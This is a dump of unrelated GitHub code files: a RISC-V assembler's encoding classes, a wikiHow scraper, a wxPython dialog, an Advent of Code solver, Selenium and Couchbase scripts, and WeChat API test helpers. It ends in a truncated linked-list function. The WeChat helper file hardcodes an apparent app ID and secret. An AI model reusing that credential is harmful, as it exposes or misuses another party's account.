blankline=True)\n\t\tdebug(self.instruction)\n\t\tdebug(self.tokensOfInstruction)\n\t\tdebug(self.dictOfFields)\n\t\tdebug(self.binaryInstruction)\n\n\t\treturn\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of R-format type\n\t- R-format type: instructions using 3 register inputs\n\t- deals with opcodes: [\"add\", \"sub\", \"and\", \"or\", \"xor\", \"sll\", \"sra\"]\nExample: \t\t\topcode rd rs1 rs2\nbinaryInstruction:\tfunct7 | rs2 | rs1 | funct3 | rd | opcode\n\"\"\"\nclass R_Inst(Instruction):\n\n\tfunct7 \t= \"\"\n\tfunct3 \t= \"\"\n\trd = \"\"\n\trs1 = \"\"\n\trs2 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.rs2 = self.getRegisterInBinary(self.tokensOfInstruction[3])\n\t\tself.funct3 = self.getFunct3()\n\t\tself.funct7 = self.getFunct7()\n\n\t\tself.binaryInstruction = self.funct7 + self.rs2 + self.rs1 \\\n\t\t\t\t\t\t\t\t+ self.funct3 + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"funct7\":self.funct7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"0110011\"\t\t\t\t\t\t\t\t# add, sub, and, or, xor, sll, sra: all have same opcode\n\n\n\tdef getFunct3(self):\n\n\t\tif self.opcode in [\"add\", \"sub\"]:\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"and\":\n\t\t\treturn \"111\"\n\t\telif self.opcode == \"or\":\n\t\t\treturn \"110\"\n\t\telif self.opcode == \"xor\":\n\t\t\treturn \"100\"\n\t\telif self.opcode == \"sll\":\n\t\t\treturn \"001\"\n\t\telif self.opcode == \"sra\":\n\t\t\treturn \"101\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct7(self):\n\t\tif self.opcode in [\"add\", \"sll\", \"xor\", \"or\", \"and\"]:\n\t\t\treturn \"0\" * 7\n\t\telse:\n\t\t\treturn \"0100000\" # sub, sra\n\n\"\"\"\nParent class: Instruction\nInstruction of I-format type\n\t- I-format type: instructions with immediates and load\n\t- deals with opcodes: [\"addi\", \"lw\", \"jalr\"]\nExample: \t\t\topcode rd rs1 immediate\nbinaryInstruction:\timmediate | rs1 | funct3 | rd | opcode\n\"\"\"\nclass I_Inst(Instruction):\n\n\tfunct3 = \"\"\n\trd = \"\"\n\trs1 = \"\"\n\timmediate = \"\" # 12 bits\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.separateOffsetFromSourceRegister(-1) # for lw\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.funct3 = self.getFunct3()\n\t\tself.immediate = self.getImmediateInBinary(self.tokensOfInstruction[3], 12)\n\n\t\tself.binaryInstruction = self.immediate + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\tif self.opcode == \"addi\":\n\t\t\treturn \"0010011\"\n\t\telif self.opcode == \"lw\":\n\t\t\treturn \"0000011\"\n\t\telif self.opcode == \"jalr\":\n\t\t\treturn \"1100111\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct3(self):\n\t\tif self.opcode in [\"addi\", \"jalr\"]:\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"lw\":\n\t\t\treturn \"010\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of S-format type\n\t- S-format type: store instructions \n\t- deals with opcodes: [\"sw\"]\nExample: \t\t\topcode rs2 immediate(rs1) \nbinaryInstruction:\timmediate_7 | rs2 | rs1 | funct3 | immediate_5 | opcode\n\"\"\"\nclass S_Inst(Instruction):\n\n\trs1 = \"\"\n\trs2 = \"\"\n\tfunct3 = \"\"\n\timmediate_5 = \"\"\n\timmediate_7 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.separateOffsetFromSourceRegister(-1) # for sw\n\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.rs2 = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.funct3 = self.getFunct3()\n\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[3], 12)\n\t\tself.immediate_7 = immediate[:7]\n\t\tself.immediate_5 = immediate[7:]\n\n\t\tself.binaryInstruction = self.immediate_7 + self.rs2 + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.immediate_5 + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate_7\":self.immediate_7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"immediate_5\":self.immediate_5 ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\tif self.opcode == \"sw\":\n\t\t\treturn \"0100011\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct3(self):\n\t\treturn \"010\" # for sw\n\n\n\"\"\"\nParent class: Instruction\nInstruction of SB-format type\n\t- SB-format type: branch instructions \n\t- deals with opcodes: [\"beq\", \"bne\", \"blt\", \"bge\"]\nExample: \t\t\topcode rs2 rs2 offset \nbinaryInstruction:\timmediate_7 | rs2 | rs1 | funct3 | immediate_5 | opcode\n\"\"\"\nclass SB_Inst(Instruction):\n\n\trs1 = \"\"\n\trs2 = \"\"\n\tfunct3 = \"\"\n\timmediate_5 = \"\"\n\timmediate_7 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs2 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.funct3 = self.getFunct3()\n\n\t\t# find rest fields in pass2 of assembler (when class method findOffset is called)\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"1100011\" # beq, bne, blt, bge\n\n\n\tdef getFunct3(self):\n\t\tif self.opcode == \"beq\":\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"bne\":\n\t\t\treturn \"001\"\n\t\telif self.opcode == \"blt\":\n\t\t\treturn \"100\"\n\t\telif self.opcode == \"bge\":\n\t\t\treturn \"101\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\t\"\"\"\n\tinstructionLocationIdx: line number of this instruction in given assembly instructions\n\tlabelsAddressMap: dictionary of (key, value) = (label, line number containing label definition)\n\t\"\"\"\n\tdef findOffset(self, instructionLocationIdx, labelsAddressMap):\n\n\t\t# last element in tokensOfInstruction is label name which we have to replace with relative offset\n\t\tlabelAddress = labelsAddressMap[self.tokensOfInstruction[-1]]\n\t\toffset = (labelAddress - instructionLocationIdx) * SizeOfInstruction\n\t\tself.tokensOfInstruction[-1] = str(offset)\n\n\t\trequiredLength = 13 # we will ignore 1 bit so asking 1 extra\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[-1], requiredLength)\n\n\t\t\"\"\"\n\t\tissue1: in the manual, LSB is index 0 while in python MSB is index 0\n\t\tissue2: in the manual string[a:b] means b inclusive while we need to add 1 in b\n\t\t \t\tfor same effect\n\n\t\tWorkaround for issue 1:\n\t\t\treverse the immediate first and when taking some substring of this,\n\t\t\treverse again\n\t\tWorkaround for issue 2:\n\t\t\tsimply add 1 when slicing, LOL\n\t\t\"\"\"\n\t\timmediate = immediate[::-1]\n\t\tself.immediate_5 = immediate[1:4 + 1][::-1] + immediate[11][::-1]\n\t\tself.immediate_7 = immediate[12][::-1] + immediate[5:10 + 1][::-1]\n\n\t\tself.binaryInstruction = self.immediate_7 + self.rs2 + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.immediate_5 + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate_7\":self.immediate_7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"immediate_5\":self.immediate_5 ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of U-format type\n\t- U-format type: instructions with upper immediates\n\t- deals with opcodes: [\"lui\"]\nExample: \t\t\topcode rd immediate \nbinaryInstruction:\timmediate | rd | opcode\n\"\"\"\nclass U_Inst(Instruction):\n\n\trd = \"\"\n\timmediate = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.immediate = self.getImmediateInBinary(self.tokensOfInstruction[2], 20)\n\n\t\tself.binaryInstruction = self.immediate + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"0110111\" # for lui\n\n\"\"\"\nParent class: Instruction\nInstruction of UJ-format type\n\t- UJ-format type: jump instruction- jal\n\t- deals with opcodes: [\"jal\"]\nExample: \t\t\topcode rd immediate \nbinaryInstruction:\timmediate | rd | opcode\n\"\"\"\nclass UJ_Inst(Instruction):\n\n\trd = \"\"\n\timmediate = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\n\t\t# find rest fields in pass2 of assembler(when class method findOffset is called)\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"1101111\" # jal\n\n\n\t\"\"\"\n\tinstructionLocationIdx: line number of this instruction in given assembly instructions\n\tlabelsAddressMap: dictionary of (key, value) = (label, line number containing label definition)\n\t\"\"\"\n\tdef findOffset(self, instructionLocationIdx, labelsAddressMap):\n\n\t\t# last element in tokensOfInstruction is label name which we have to replace with relative offset\n\t\tlabelAddress = labelsAddressMap[self.tokensOfInstruction[-1]]\n\t\toffset = (labelAddress - instructionLocationIdx) * SizeOfInstruction\n\t\tself.tokensOfInstruction[-1] = str(offset)\n\n\t\trequiredLength = 21 # we will ignore 1 bit so asking 1 extra\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[-1], requiredLength)\n\t\t\"\"\"\n\t\tissue1: in the manual, LSB is index 0 while in python MSB is index 0\n\t\tissue2: in the manual string[a:b] means b inclusive while we need to add 1 in b\n\t\t \t\tfor same effect\n\n\t\tWorkaround for issue 1:\n\t\t\treverse the immediate first and when taking some substring of this,\n\t\t\treverse again\n\t\tWorkaround for issue 2:\n\t\t\tsimply add 1 when slicing, LOL\n\t\t\"\"\"\n\t\timmediate = immediate[::-1]\n\t\tself.immediate = immediate[20][::-1] + immediate[1:10 + 1][::-1] \\\n\t\t\t\t\t\t + immediate[11][::-1] + immediate[12:19 + 1][::-1]\n\n\t\tself.binaryInstruction = self.immediate + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n","repo_name":"Sanyam-Agrawal/RISC-V_Simulator","sub_path":"Assembler/instruction.py","file_name":"instruction.py","file_ext":"py","file_size_in_byte":15715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70559552864","text":"import scrapy\nfrom ..items import WikItem\nfrom urllib.parse import urljoin\n\nclass WikwikSpider(scrapy.Spider):\n name = 'wikwik'\n allowed_domains = ['wikihow.com.tr']\n start_urls = ['https://www.wikihow.com.tr/Kategori:E%C4%9Fitim-ve-%C4%B0leti%C5%9Fim']\n def parse(self, response):\n all_contents = response.xpath('//*[@class=\"thumbnail s-height s-width\"]')\n for content in all_contents:\n link = content.xpath('./a/@href').get()\n yield response.follow(url = link, callback = self.parse_pages)\n next_page = response.xpath('//*[@id=\"cat_all\"]/a[2]/@href').get()\n yield response.follow(url = urljoin('https://www.wikihow.com.tr', next_page), callback=self.parse)\n\n def parse_pages(self, response):\n data = WikItem()\n article=' '\n data['title'] = response.xpath('//h1[contains(@class, \"firstHeading\")]/a/text()').get()\n p_list = response.xpath('//div[@class=\"step\"]/descendant::text()').getall()\n for p in p_list:\n if p == '\\n':\n pass\n else:\n article = article + p\n data['article']=article\n yield data\n","repo_name":"CihanErsoy/wikihow-scraping","sub_path":"wik/spiders/wikwik.py","file_name":"wikwik.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71081866783","text":"##\\file nodelibdlg.py\r\n##\\brief A dialog to browse all child nodes of an object that form a library\r\n\r\nimport wx\r\nimport pynebula\r\n\r\nimport conjurerconfig as cfg\r\n\r\n# File dialog styles\r\nNEW = 1\r\nOPEN = 2\r\nDELETE = 3\r\nSELECT = 4\r\n\r\n# get_node_list function\r\ndef get_node_list(path):\r\n \"\"\"\r\n Lists all child nodes in the library path\r\n \"\"\"\r\n gui_names = []\r\n if (pynebula.exists(str(path))):\r\n obj = pynebula.sel(path)\r\n children = obj.getchildren()\r\n for node in children:\r\n gui_names.append(node.getname())\r\n\r\n return gui_names\r\n\r\n# NodeLibDialog class\r\nclass NodeLibDialog(wx.Dialog):\r\n \"\"\"\r\n Browser for nodes in a given noh path:\r\n \\param parent Parent window\r\n \\param style Style of the dialog (NEW, OPEN, DELETE)\r\n \\param label1 Lowercase node type name\r\n \\param label2 Capitalized node type name\r\n \\param path Hierarchy path to search for subnodes\r\n \"\"\"\r\n\r\n def __init__(self, parent, style, label1, label2, path, default_name=\"\"):\r\n if style == NEW:\r\n title = \"Choose a %s name\" % label1\r\n elif style == OPEN:\r\n title = \"Choose a %s to open\" % label1\r\n elif style == DELETE:\r\n title = \"Choose a %s to delete\" % label1\r\n else:\r\n title = \"Choose a %s\" % label1\r\n wx.Dialog.__init__(\r\n self, \r\n parent, \r\n title=title,\r\n style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER\r\n )\r\n self.style = style\r\n self.path = path\r\n if (pynebula.exists(str(path))):\r\n self.root = pynebula.lookup( str(path) )\r\n else:\r\n self.root = None\r\n\r\n self.list_nodes = wx.ListBox(\r\n self, \r\n -1, \r\n choices = get_node_list(self.path)\r\n )\r\n\r\n if self.style == NEW:\r\n self.label_file = wx.StaticText(\r\n self, \r\n -1, \r\n \"%s name\" % label2\r\n )\r\n self.text_file = wx.TextCtrl(self, -1, default_name)\r\n if self.style == NEW:\r\n ok_caption = \"&New\"\r\n elif self.style == OPEN:\r\n ok_caption = \"&Open\"\r\n elif self.style == DELETE:\r\n ok_caption = \"&Delete\"\r\n else:\r\n ok_caption = \"&OK\"\r\n\r\n self.button_ok = wx.Button(self, -1, ok_caption)\r\n self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"&Cancel\")\r\n\r\n self.__set_properties()\r\n self.__do_layout()\r\n self.__bind_events()\r\n\r\n def __set_properties(self):\r\n # Make the ok button the default one when pressing 'return'\r\n self.button_ok.SetDefault()\r\n # Enable/disable ok button\r\n self.__on_change_name(None)\r\n\r\n def __do_layout(self):\r\n sizer_border = wx.BoxSizer(wx.VERTICAL)\r\n sizer_layout = wx.BoxSizer(wx.VERTICAL)\r\n sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer_layout.Add(self.list_nodes, 1, wx.EXPAND)\r\n if self.style == NEW:\r\n sizer_file = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer_file.Add(\r\n self.label_file, \r\n 0, \r\n wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE\r\n )\r\n sizer_file.Add(\r\n self.text_file, \r\n 1, \r\n wx.LEFT|wx.FIXED_MINSIZE, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_layout.Add(\r\n sizer_file, \r\n 0, \r\n wx.TOP|wx.EXPAND, \r\n cfg.BORDER_WIDTH\r\n )\r\n horizontal_line = wx.StaticLine(\r\n self, \r\n -1, \r\n ( -1, -1 ), \r\n ( -1, -1 ), \r\n wx.LI_HORIZONTAL \r\n )\r\n sizer_layout.Add(\r\n horizontal_line, \r\n 0, \r\n wx.EXPAND|wx.TOP, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_buttons.Add(\r\n self.button_ok, \r\n 1, \r\n wx.FIXED_MINSIZE\r\n )\r\n sizer_buttons.Add(\r\n self.button_cancel, \r\n 1, \r\n wx.LEFT|wx.FIXED_MINSIZE, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_layout.Add(\r\n sizer_buttons, \r\n 0, \r\n wx.TOP|wx.ALIGN_RIGHT, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_border.Add(\r\n sizer_layout, \r\n 1, \r\n wx.ALL|wx.EXPAND, \r\n cfg.BORDER_WIDTH\r\n )\r\n self.SetAutoLayout(True)\r\n self.SetSizerAndFit(sizer_border)\r\n self.Layout()\r\n\r\n def __bind_events(self):\r\n self.Bind(wx.EVT_LISTBOX, self.__on_select_node, self.list_nodes)\r\n self.Bind(wx.EVT_LISTBOX_DCLICK, self.__on_ok, self.list_nodes)\r\n if self.style == NEW:\r\n self.Bind(wx.EVT_TEXT, self.__on_change_name, self.text_file)\r\n self.Bind(wx.EVT_BUTTON, self.__on_ok, self.button_ok)\r\n self.Bind(wx.EVT_BUTTON, self.__on_cancel, self.button_cancel)\r\n\r\n def __on_select_node(self, event):\r\n if self.style == NEW:\r\n self.text_file.SetValue( self.list_nodes.GetStringSelection() )\r\n else:\r\n self.__on_change_name(None)\r\n\r\n def __on_change_name(self, event):\r\n # enable the ok button only when there is some input text\r\n if self.style == NEW:\r\n self.button_ok.Enable( self.text_file.GetValue() != \"\" )\r\n else:\r\n self.button_ok.Enable(\r\n self.list_nodes.GetSelection() != wx.NOT_FOUND \r\n )\r\n\r\n if self.style == SELECT:\r\n self.SetTitle( self.list_nodes.GetStringSelection() )\r\n\r\n def __on_ok(self, event):\r\n self.EndModal(wx.ID_OK)\r\n\r\n def __on_cancel(self, event):\r\n self.EndModal(wx.ID_CANCEL)\r\n\r\n def get_guiname(self):\r\n if self.style == NEW:\r\n return self.text_file.GetValue()\r\n else:\r\n return self.list_nodes.GetStringSelection()\r\n\r\n def node_exists(self):\r\n return self.get_node() is not None\r\n\r\n def get_node(self):\r\n if self.root is None:\r\n return None\r\n else:\r\n return self.root.find(\r\n str( self.get_guiname() ) \r\n )\r\n","repo_name":"xuebai5/TheZombieEngine","sub_path":"zombie/code/conjurer/conjurer/gui/nodelibdlg.py","file_name":"nodelibdlg.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"33171247241","text":"# Dictionary converting shape to points\nshape_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\n# Dictionary converting opponents play\n# and our play into outcome points (part 1)\noutcome_dict = {\n \"A\": {\n \"X\": 3,\n \"Y\": 6,\n \"Z\": 0\n },\n \"B\": {\n \"X\": 0,\n \"Y\": 3,\n \"Z\": 6\n },\n \"C\": {\n \"X\": 6,\n \"Y\": 0,\n \"Z\": 3\n }\n}\n\n# Dictionary converting opponents play\n# and result into shape points (part 2)\nresult_to_choice = {\n \"A\": {\n \"X\": 3,\n \"Y\": 1,\n \"Z\": 2\n },\n \"B\": {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n },\n \"C\": {\n \"X\": 2,\n \"Y\": 3,\n \"Z\": 1\n }\n}\n\n# Dictionary converting result into outcome points\nresult_points = {\n \"X\": 0,\n \"Y\": 3,\n \"Z\": 6\n}\n\nwith open('input.txt', 'r') as in_file:\n first_score = 0\n second_score = 0\n for line in in_file:\n opp_move, my_move = line.strip().split(\" \")\n first_score += shape_score[my_move] + outcome_dict[opp_move][my_move]\n second_score += result_points[my_move] + result_to_choice[opp_move][my_move]\n \n print(f'First part: {first_score}')\n print(f'Second part: {second_score}')","repo_name":"landgrafjacob/AdventOfCode2022","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24811397002","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport math\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n# говорим Selenium проверять в течение 12 секунд, пока цена не станет $100\nprice = WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, \"price\"), text_=\"$100\"))\n\n#нажимаем на кнопку после того как цена 100\nbutton = browser.find_element_by_css_selector(\"#book\")\nbutton.click()\n\n#решаем пример\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\nx_element = browser.find_element_by_css_selector('#input_value')\nx = x_element.text\ny = calc(x)\n\n# Мой код, который заполняет поле\ninput1 = browser.find_element_by_css_selector('#answer')\ninput1.send_keys(y)\n\n#нажимаем на кнопку\nbutton = browser.find_element_by_css_selector(\"#solve\")\nbutton.click()\n","repo_name":"vikitikipiki/stepik_auto_tests_course","sub_path":"2.4.8.py","file_name":"2.4.8.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72736246302","text":"import argparse\nfrom threading import Thread\nfrom time import sleep, time\nfrom couchbase_v2.bucket import Bucket, FMT_BYTES\nfrom couchbase_core.transcoder import Transcoder\n\nap = argparse.ArgumentParser()\n\nap.add_argument('-t', '--threads', default=4, type=int,\n help=\"Number of threads to spawn. 0 means no threads \"\n \"but workload will still run in the main thread\")\n\nap.add_argument('-d', '--delay', default=0, type=float,\n help=\"Number of seconds to wait between each op. \"\n \"may be a fraction\")\n\nap.add_argument('-U', '--connstr', default='couchbase://localhost/default',\n help=\"Connection string\")\n\nap.add_argument('-p', '--password', default=None, type=str)\nap.add_argument('-b', '--bucket', default=None, type=str)\nap.add_argument('-u', '--user', default=None, type=str)\n\nap.add_argument('-D', '--duration', default=10, type=int,\n help=\"Duration of run (in seconds)\")\nap.add_argument('-T', '--transcoder', default=False,\n action='store_true',\n help=\"Use the Transcoder object rather than built-in \"\n \"conversion routines\")\n\nap.add_argument('--ksize', default=12, type=int,\n help=\"Key size to use\")\n\nap.add_argument('--vsize', default=128, type=int,\n help=\"Value size to use\")\nap.add_argument('--iops', default=False, action='store_true',\n help=\"Use Pure-Python IOPS plugin\")\n\nap.add_argument('--batch', '-N', default=1, type=int,\n help=\"Number of commands to schedule per iteration\")\n\noptions = ap.parse_args()\nDO_UNLOCK_GIL = options.threads > 0\nTC = Transcoder()\n\n\nclass Worker(Thread):\n def __init__(self):\n self.delay = options.delay\n self.key = 'K' * options.ksize\n self.value = b'V' * options.vsize\n self.kv = {}\n for x in range(options.batch):\n self.kv[self.key + str(x)] = self.value\n self.wait_time = 0\n self.opcount = 0\n connopts = { \"connstr\" : options.connstr,\n \"unlock_gil\": DO_UNLOCK_GIL,\n \"password\": options.password}\n if options.iops:\n connopts[\"experimental_gevent_support\"] = True\n\n self.cb = Bucket(**connopts)\n\n if options.transcoder:\n self.cb.transcoder = TC\n self.end_time = time() + options.duration\n super(Worker, self).__init__()\n\n def run(self, *args, **kwargs):\n cb = self.cb\n\n while time() < self.end_time:\n begin_time = time()\n rv = cb.upsert_multi(self.kv, format=FMT_BYTES)\n assert rv.all_ok, \"Operation failed: \"\n self.wait_time += time() - begin_time\n\n if self.delay:\n sleep(self.delay)\n\n self.opcount += options.batch\n\n\nglobal_begin = None\nworker_threads = []\nif not options.threads:\n # No threding requested:\n w = Worker()\n worker_threads.append(w)\n global_begin = time()\n w.run()\nelse:\n for x in range(options.threads):\n worker_threads.append(Worker())\n\n global_begin = time()\n for t in worker_threads:\n t.start()\n\n for t in worker_threads:\n t.join()\n\nglobal_duration = time() - global_begin\ntotal_ops = sum([w.opcount for w in worker_threads])\ntotal_time = 0\nfor t in worker_threads:\n total_time += t.wait_time\n\nprint(\"Total run took an absolute time of %0.2f seconds\" % (global_duration,))\nprint(\"Did a total of %d operations\" % (total_ops,))\nprint(\"Total wait time of %0.2f seconds\" % (total_time,))\nprint(\"[WAIT] %0.2f ops/second\" % (float(total_ops)/float(total_time),))\nprint(\"[ABS] %0.2f ops/second\" % (float(total_ops)/float(global_duration),))\n","repo_name":"griels/couchbase-python-client-ng","sub_path":"examples/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24375603548","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/11/30 16:46\n# @Author : Limusen\n# @File : common_api\n\n\nimport requests\nfrom common.localconfig_utlis import local_config\n\n\ndef get_access_token_api(session, grant_type, appid, secret):\n params = {\n \"grant_type\": grant_type,\n \"appid\": appid,\n \"secret\": secret,\n }\n headers = {'content_type': 'application/json'}\n response = session.get(url=local_config.URL + '/cgi-bin/token',\n params=params,\n headers=headers)\n return response\n\n\ndef get_token_value(session):\n response = get_access_token_api(session,\n \"client_credential\",\n \"wxb637f897f0bf1f0d\",\n \"501123d2d367b109a5cb9a9011d0f084\")\n return response.json()['access_token']\n\n\ndef create_usr_tag_api(session, access_token, tag_json):\n \"\"\"\n fang\n :param access_token:\n :param tag_json:\n :return:\n \"\"\"\n params = {\n \"access_token\": access_token\n }\n json_data = tag_json\n headers = {'content_type': 'application/json'}\n response = session.post(url=local_config.URL + \"/cgi-bin/tags/create\",\n params=params,\n json=json_data,\n headers=headers)\n\n return response\n\n\ndef delete_usr_tag_api(session, access_token, tag_json):\n \"\"\"\n 删除标签\n :param access_token:\n :param tag_json:\n :return:\n \"\"\"\n params = {\n \"access_token\": access_token\n }\n json_data = tag_json\n response = session.post(url=local_config + \"/cgi-bin/tags/delete\",\n params=params,\n json=json_data)\n return response\n","repo_name":"liousAlready/Basic_api_test","sub_path":"common/common_api.py","file_name":"common_api.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30656662093","text":"'''\n1\n2 1\n4 2 1\n8 4 2 1\n16 8 4 2 1\n32 16 8 4 2 1\n '''\n# first input the number of rows\nrows = int(input())\n# outer loop\nfor i in range(1, rows+1):\n # Inner loop start, stop and step\n for j in range(-1+i, -1, -1):\n print(2**j, end=' ')\n # for new lines\n print('')\n\n# list comprehension\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nsquare = [i*i for i in a if i%2 == 0]\nprint(square)\n\n# lambda function map, reduce, filter\nsquare_list = list(map(lambda x: x*x, a))\nprint(square_list)\n\n","repo_name":"amar-jain123/PythonLoop","sub_path":"loop/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4757866636","text":"import pytest\nfrom linkedlist import *\n\ndef mergeLinkedLists(linkedList_one, linkedList_two):\n \"\"\"Merge two doubly linked lists that are in sorted order.\n\n Merge two doubly linked lists that are in sorted order. The merged list will also be in sorted order. The merge is done in place, so the returned linked list is `linkedList_one` with its head updated.\n\n Args:\n linkedList_one (LinkedList): The first linked list to merge.\n linkedList_two (LinkedList): The second linked list to merge.\n\n Returns:\n LinkedList: The merged 